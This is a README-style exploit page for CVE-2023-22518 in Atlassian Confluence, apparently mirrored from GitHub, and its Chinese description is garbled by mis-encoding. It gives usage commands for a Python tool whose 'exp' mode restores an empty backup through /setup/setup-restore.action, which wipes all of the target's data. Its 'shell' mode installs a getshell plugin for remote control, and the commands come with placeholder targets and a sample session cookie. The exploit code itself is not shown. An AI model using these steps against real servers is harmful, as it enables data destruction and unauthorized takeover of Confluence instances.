Share
## https://sploitus.com/exploit?id=B3368981-8F94-55C2-A696-DAAC86044700
# CVE-2023-22518
Confluence CVE-2023-22518
## Description
+ `xmlexport-20231127-071916-1.zip`๏ผConfluence ็ฉบๅคไปฝๆไปถ๏ผ**็ฉบๅคไปฝไผๅฏผ่ดๆขๅคๅไธขๅคฑๅ
จ้จๆฐๆฎ**๏ผ๏ผ๏ผ
+ ๅคไปฝๆไปถๅฏ่ช่กๆฟๆข๏ผ็ฝฎไบ่ๆฌๅ็บง็ฎๅฝๅณๅฏ
+ `shellplug.jar`๏ผgetshell ๆไปถ๏ผๆฅๆบไบ๏ผhttps://github.com/youcannotseemeagain/CVE-2023-22515_RCE
+ ๅฏผๅบๅคไปฝๆไปถ็ๆฅๅฃ`/setup/setup-restore.action`๏ผ้่ฆ็ปๅฝไธๆๆ้
## Usage
```powershell
python .\CVE-2023-22518.py -h
โโโโโโโโโโ โโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโโ โโโ โโโโโโ
โโโโโโโโโโโ โโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โโโ โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โโโโ โโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโโ โโโโโโโโโโโ
โโโโโโโโ โโโโโโโ โโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโ
โโโโโโโ โโโโโ โโโโโโโโ โโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโโโโ
@Auth: C1ph3rX13
@Blog: https://c1ph3rx13.github.io
@Note: ไปฃ็ ไป
ไพๅญฆไน ไฝฟ็จ๏ผ่ฏทๅฟ็จไบๅ
ถไป็จ้
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target Url
-id JSESSIONID, --jsessionid JSESSIONID
JSESSIONID
--timeout TIMEOUT Timeout (Default: 30 Seconds)
--proxy PROXY Proxy
```
### POC
```powershell
python .\CVE-2023-22518.py poc -t http://IP:Port
```
![img](https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22518/main/images/CVE-2023-22518-poc.png)
### Exp
```powershell
Cookie:
JSESSIONID=754BEE347CD53ECB342B74CFFDD33B4D
python .\CVE-2023-22518.py exp -t http://IP:Port -id 754BEE347CD53ECB342B74CFFDD33B4D
```
![img](https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22518/main/images/CVE-2023-22518-exp.png)
### Shell
```powershell
Cookie:
JSESSIONID=754BEE347CD53ECB342B74CFFDD33B4D
python .\CVE-2023-22518.py shell -t http://IP:Port -id 754BEE347CD53ECB342B74CFFDD33B4D
```
![img](https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22518/main/images/CVE-2023-22518-shell.png)
## Thanks
https://github.com/ForceFledgling/CVE-2023-22518
https://github.com/sanjai-AK47/CVE-2023-22518